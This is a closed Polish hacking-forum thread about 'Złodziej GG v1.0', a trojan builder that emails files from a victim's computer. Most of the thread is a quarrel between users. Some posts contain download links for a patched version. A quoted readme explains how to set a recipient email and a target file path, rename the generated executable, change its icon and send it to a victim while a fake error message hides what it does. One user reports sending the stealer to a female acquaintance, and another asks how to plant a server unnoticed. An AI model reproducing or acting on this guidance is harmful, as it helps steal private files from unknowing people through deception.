Złodziej GG v1.0 [DOWNLOAD]

Status
Zamknięty.

Wojtek

Były Moderator
Dołączył
Maj 23, 2007
Posty
546
Originally posted by pawel1178
to wrzucie tu porgram ktory jest juz poprawiony i dobry bo nie kazdy umie go sobie przerobić

Nie bede komentował -.-
przeczytaj jescze raz dokładnie co napisał Mo4x to sie dowiesz dlaczego ...
<
 

qb@&amp;#036;

Użytkownik
Dołączył
Wrzesień 3, 2007
Posty
11
w wierszu poleceń------> <spacja> przeciągam UPX-a ---> <spacja> ----> <-b> ----> <spacja> przeciągam wygenrowany plik aplikacją ,,Złodziej GG''-----> a następnie wciskam <ENTER> i niżej pojawia się następujący komunikat...
,, upx: illegal option --b
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..''

i nie mam pojęcia czy to się gdzieś wypakowywuje czy nie... przepraszam za moją upierdliwość... ale wiem jak trudno jest się dzielić wiedza dla siebie oczywistą... za chwile jak ktoś chce to zrobie skreeny... jak to ma w czymś pomóć
 

Gebels

Użytkownik
Dołączył
Lipiec 23, 2007
Posty
57
31337 nie ma co gratuluję ci progsa http://www.haker.com.pl/forum/viewtopic.php?t=32689. To co sobą zaprezentowałeś "niszcząc" Złodzieja 1.0 było po prostu żałosne i prymitywne, zarówna jak twoja egzystencja. W taki sposób chciałeś pokazać autorowi błąd w programie?! Gratuluję... Gdzie jest ten "świetny" progs, który to niby miał być lepszy od złodzieja, pokazując jaki to z ciebie miszczu 'programator' ?!?!?!? Przecież to nawet nie wykrada archiwum, nie wysyła na maila, hahaha turlam się ze smiechu. "Nie bierz sie za rzeczy o których nie masz bladego pojęcia." <- pisałeś coś takiego do Dark Smark, ale LOL. Spójrz co ty napisałeś... Człowieku, lepiej w ogóle się nie odzywaj... brak ci HONORU, jeśli wiesz co to jest w ogóle... Krytykowałeś kogoś, a sam zrobiłeś DNO. Żal mi ciebie... gardzę takimi ludźmi jak ty...
 

Kanciastoporty

Były Moderator
Dołączył
Grudzień 19, 2006
Posty
1137
Gebels nie dorastasz 31337 do piet i nigdy nie dorosniesz wiec ja bym ci radzil stulic pysk i nie odzywac sie na temat tego (w tym wypadku ludzi) o czym (o kim) nie masz pojecia
to na przyszlosc
 
3

31337

Gość
31337 nie ma co gratuluję ci progsa http://www.haker.com.pl/f...ic.php?t=32689. To co sobą zaprezentowałeś "niszcząc" Złodzieja 1.0 było po prostu żałosne i prymitywne, zarówna jak twoja egzystencja. W taki sposób chciałeś pokazać autorowi błąd w programie?! Gratuluję... Gdzie jest ten "świetny" progs, który to niby miał być lepszy od złodzieja, pokazując jaki to z ciebie miszczu 'programator' ?!?!?!? Przecież to nawet nie wykrada archiwum, nie wysyła na maila, hahaha turlam się ze smiechu. "Nie bierz sie za rzeczy o których nie masz bladego pojęcia." <- pisałeś coś takiego do Dark Smark, ale LOL. Spójrz co ty napisałeś... Człowieku, lepiej w ogóle się nie odzywaj... brak ci HONORU, jeśli wiesz co to jest w ogóle... Krytykowałeś kogoś, a sam zrobiłeś DNO. Żal mi ciebie... gardzę takimi ludźmi jak ty...[/b]
1. To nie pierwszy tego typu Jego błąd, a powinien już wcześniej wyciągnąć wnoski.
2. Czy ja powiedziałem że wszystko umiem? Poprostu umiem więcej od autora zlodzieja.
A przynajmniej umiem myśleć.
3. Oddałem źródło bo nie mam czasu pisać tego programu. Może ktoś dokończy, a może nie. Działa jak powinien, zamień se funkcje sendto na printf i masz.
4.
gardzę takimi ludźmi jak ty...[/b]
i co teraz bedzie, pewnie sie poplacze :no:


a tu jest patch dla tych co nie umią sie posługiwac upxem i hexedytorem:
http://www.speedyshare.com/833692495.html
 

amex

Użytkownik
Dołączył
Marzec 11, 2007
Posty
934
Originally posted by Kanciastoporty+--><div class='quotetop'>CYTAT(Kanciastoporty)</div>
Gebels nie dorastasz 31337 do piet i nigdy nie dorosniesz[/b]
No bez jaj, 31337 to jakiś pr0 mega i super programmer czy jak? Może go nie doceniam?

Originally posted by Kanciastoporty+--><div class='quotetop'>CYTAT(Kanciastoporty)</div>
wiec ja bym ci radzil stulic pysk[/b]
Może by tak trochę kultury co? To że być może Gebels trochę przesadził w swoim poście nie oznacza, że możesz tak do ludzi pisać... przyznam że spodziewałem się u Ciebie więcej intelektu (przynajmniej) w postach...

Originally posted by 31337
1. To nie pierwszy tego typu Jego błąd, a powinien już wcześniej wyciągnąć wnoski.
Pokaż nam to... chyba że to następne słowa bez pokrycia...?!

<!--QuoteBegin-31337
@
2. Czy ja powiedziałem że wszystko umiem? Po prostu umiem więcej od autora zlodzieja.
A przynajmniej umiem myśleć.
jakoś tego nie okazałeś...

<!--QuoteBegin-31337

3. Oddałem źródło bo nie mam czasu pisać tego programu.
trzeba było się nie deklarować że to zrobisz, dzieciniada... "zrobię lepsze ale mi się nie chce/nie mam czasu...." żal.pl

Originally posted by 31337
a tu jest patch dla tych co nie umią sie posługiwac upxem i hexedytorem:
http://www.speedyshare.com/833692495.html
n/c

PS: nie żebym bronił Gebelsa, ja tylko stwierdzam (lub próbuje stwierdzić) faktyGebels
 

Wojtek

Były Moderator
Dołączył
Maj 23, 2007
Posty
546
Ludzie nie ma sie o co kłócić ... 31337 mógł troche w "inny" sposób pokazać Dark ~ że zrobił błąd ... każdy sie myli ...
31337 nie musi nic nikomu udowadniać ... nawet nie wiem poco zrobił swoją wersję ~

Originally posted by Kanciastoporty
Gebels nie dorastasz 31337 do piet i nigdy nie dorosniesz
a może jednak ...
smile.gif



@Down: rzeczywiście nie zwróciłem na to uwagi ...
 

Kanciastoporty

Były Moderator
Dołączył
Grudzień 19, 2006
Posty
1137
Kanciastoporty napisał/a:
Gebels nie dorastasz 31337 do piet i nigdy nie dorosniesz
No bez jaj, 31337 to jakiś pr0 mega i super programmer czy jak? Może go nie doceniam?[/b]
przeczytaj sobie posty obydwoch panow a zobaczysz roznice
Kanciastoporty napisał/a:
Gebels nie dorastasz 31337 do piet i nigdy nie dorosniesz

a może jednak ...[/b]
jw, poczytaj sobie posty pana Gebelsa ktory gardzi 31337
 

amex

Użytkownik
Dołączył
Marzec 11, 2007
Posty
934
Originally posted by wojtekingim+--><div class='quotetop'>CYTAT(wojtekingim)</div>
31337 nie musi nic nikomu udowadniać ... nawet nie wiem poco zrobił swoją wersję ~[/b]
skoro się deklarował że zrobi to niech teraz dotrzyma słowa.... chyba że to jest prawda:
Originally posted by Gebels+--><div class='quotetop'>CYTAT(Gebels)</div>
brak ci HONORU[/b]

<!--QuoteBegin-kanciastoporty
@
przeczytaj sobie posty obydwoch panow a zobaczysz roznice
jeden z pierwszych postów 31337

<!--QuoteBegin-31337

Załóżmy że w zmiennej q mam jakiś string.
Jak moge uruchomić jakiś program z tym parametrem?
NP:
system("dir "+q) - wiecie o co chodzi?

bardzo pr0 inteligentne pytanie, sam wyciągnij z tego wnioski...
 

Kanciastoporty

Były Moderator
Dołączył
Grudzień 19, 2006
Posty
1137
wziales pierwszy post z forum 31337... zalosne. Zobacz najpierw na swoje pytania
Originally posted by amex
i jeszcze jedno, jak wyslac komus serwer zeby nie wiedzial ze ma go na komputerze? i czy jest w ogole taka mozliwosc? z gory dzieki za pomoc, pozdrawiam!
albo ten temat http://www.haker.com.pl/forum/viewtopic.ph...ghlight=#155680
Originally posted by amex
D0han napisał/a:
@amex
Kod:
[win]+[r]
cmd
[enter]
help
[enter]
set
[enter]


no tak ale sam chyba pryznasz, żę nie koniecznie zrozumiała jest ta pomoc dla początkującego, czyż nie??
wiec co? Jakbys sie uparl to bys znalazl durne posty i pytania innych uzytkownikow, moje tez. Jednak wg mnie stanowia one mniejszosc.
Nie mozna powiedziec tego o postach Gebelska, juz nie bede wyroznial poszczegolnych przypadkow bo nie mam czasu. Przemysl
 

black pearl

Użytkownik
Dołączył
Wrzesień 6, 2007
Posty
4
Naród się kłuci a projekt stoi (przynajmniej poprawka), prawie jak w sejmie. Wcale się nie dziwie że Dark się stąd wyniósł...
 

amex

Użytkownik
Dołączył
Marzec 11, 2007
Posty
934
Mój powyższy post miał za zadanie uświadomić Ci, że każdy kiedyś zaczynał i nie można powiedzieć że ktoś komuś nigdy nie dorówna, bo nie możesz być tego pewien! Sam byłem kiedyś lamerem i zadawałem bardzo debilne pytanie, nigdy tego nie ukrywałem i nie mam zamiaru, każdy jakoś zaczynał...

Skąd wiesz jak będą wyglądały posty Gebelsa za pół roku?
 
H

hAd3s

Gość
Originally posted by amex+--><div class='quotetop'>CYTAT(amex)</div>
<!--QuoteBegin-31337
1. To nie pierwszy tego typu Jego błąd, a powinien już wcześniej wyciągnąć wnoski.
Pokaż nam to... chyba że to następne słowa bez pokrycia...?!
[/b]

31337 ma racje, to nie pierwszy błąd tego typu w wykonaniu Dark Smark'a. Otóż w programie Złodziej, który został stworzony jakiś czas temu jest dokładnie ten sam błąd.

Oto zawartość pliku readme.txt :

=****************************=
=**http://www.smark.yoyo.pl**=
=****************************=
==============================

Program złodziej służy do
wykradania plików.

W konfiguratorze podajemy
email na który ma zostać
wysłany plik i lokacje pliku
NP: Gdy chcemy ściągnąć od
kogoś plik to podajemy swój
email i dowiadujemy się
gdzie znajduje się plik
który chcemy ściągnąć.
Jeżeli ktoś np: posiada
plik haslo.txt to musimy
się dowiedzieć gdzie go trzyma
np: C:haslo.txt wpisujemy to w
lokacje !WPISYWAĆ DOKŁADNIE!
klikamy Generuj.
Powstaje Plik.exe, możemy zmienić
nazwe, ikone i wysłać ofiarze.

PLIK JEST NIEGROŹNY!!! po odpaleniu
wyskakuje fałszywy error
ERROR 615632187x Nie znaleziono taskmgr.dll
który ma wprowadzić w błąd.
Program wysyła podany plik z lokacji na email
i się wyłącza...

W razie błędów zgłaszać na podany email:
[email protected][/b]

Projekt został zamknięty, ponieważ na podstawie tutka Mo4x'a prędzej czy później ktoś by to zrobił ...
 

kazio199

Użytkownik
Dołączył
Wrzesień 4, 2007
Posty
19
panowie dlaczego ten program mi nic nie wysyła na poczte ???? wygenerowałęm serwer odpaliłem go na swoim kompie ok ale dzisiaj już niechce mi nic wysyłac podesłałem serwer koleżance i tez nic !
 
Status
Zamknięty.
Do góry Bottom